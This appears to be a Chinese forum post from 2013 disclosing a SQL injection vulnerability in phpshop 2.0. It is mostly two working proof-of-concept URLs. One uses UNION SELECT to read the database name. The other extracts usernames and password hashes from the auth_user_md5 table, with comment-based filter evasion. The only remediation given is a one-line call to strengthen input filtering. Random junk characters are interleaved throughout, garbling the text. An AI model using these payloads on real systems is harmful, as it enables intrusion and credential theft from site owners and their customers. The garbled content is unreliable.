标题 : phpshop 2.0 SQL Injection Vulnerability5 c8 h; p. l3 q* a+ F ~
9 ]/ j0 Z/ F+ ?: }9 A; j
作者 : By onestree
* ~, ?2 _- i/ U- L下载地址 : http://code.google.com/p/phpshop/downloads/list
/ n$ Z: U% H( m J4 h测试地址: windows 7 / ubuntu7 T. K8 }2 k/ d0 ]
+ X4 t9 A: ^0 X; f" ?; o) }
2 S$ z. r: P) o# ~2 k6 LSQLi p0c:3 n# e5 B0 f5 {- Y u7 L7 m1 o
/ o5 Q; Y1 ?4 J
==================- [0 T+ c1 D3 v2 g$ h
3 f. l2 H0 D9 k7 S1 z
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'/ |0 U8 ^: K8 k+ W n
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
; m- n' |0 r. @# f9 [' p
. p3 w1 E% F0 e; a( y) P. q1 Phttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
8 a* l+ ]9 y3 l( n+ g7 |# c* M0 @& j( F' G# Z7 v$ H
修复:
/ r5 f( O! Q# t$ k- {# k/ O- X加强过滤) R8 k9 ] y( s( u" y7 C
$ } E1 W7 {% z1 C( `6 p T% e
" I( P5 B2 B& F. I |
发表于 2013-1-18 18:24:10
收藏
支持
反对